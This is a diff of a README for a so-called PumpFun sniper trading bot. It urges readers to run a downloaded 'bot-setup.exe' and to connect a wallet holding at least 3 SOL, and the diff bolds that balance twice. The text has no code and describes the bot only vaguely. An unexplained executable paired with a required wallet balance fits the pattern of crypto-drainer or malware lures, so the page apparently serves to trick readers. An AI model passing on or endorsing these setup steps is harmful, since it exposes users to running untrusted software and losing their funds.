SniperDev00001/PumpFun-Sniper-Bot/README.md

 Welcome to PumpFun Bot, your ultimate trading companion designed specifically for PumpFun.
 Whether you're a seasoned trader or just starting out, PumpFun Bot equips you with the tools and flexibility to navigate the virtual trading world with confidence and ease.

 ## Getting Started
 1. **Download**: Download directly from this repository.
-Simply execute the file bot-setup.exe and start using the bot!
+Simply execute the file **bot-setup.exe** and start using the bot!
-2. **Installation**: Follow the provided instructions to install PumpFun Bot on your device.
+2. **Connection**: Connect your wallet with **minimum 3 SOL** inside.
 3. **Customization**: Customize your trading strategy according to your preferences and risk tolerance.
 4. **Start Trading**: Begin trading with PumpFun Bot and take your trading game to the next level!

 ## Features
 ### 1. Connect Wallet
-To begin utilizing the full capabilities of the bot, please ensure that you connect your wallet first and have a minimum balance of 3 SOL.
+To begin utilizing the full capabilities of the bot, please ensure that you connect your wallet first and have a **minimum balance of 3 SOL**.

 ### 2. Strategy Selection
 Choose from a diverse range of trading strategies tailored to your preferences and risk tolerance.
 Whether you prefer analysis-driven, trend-following, or risk-averse approaches, PumpFun Bot has you covered.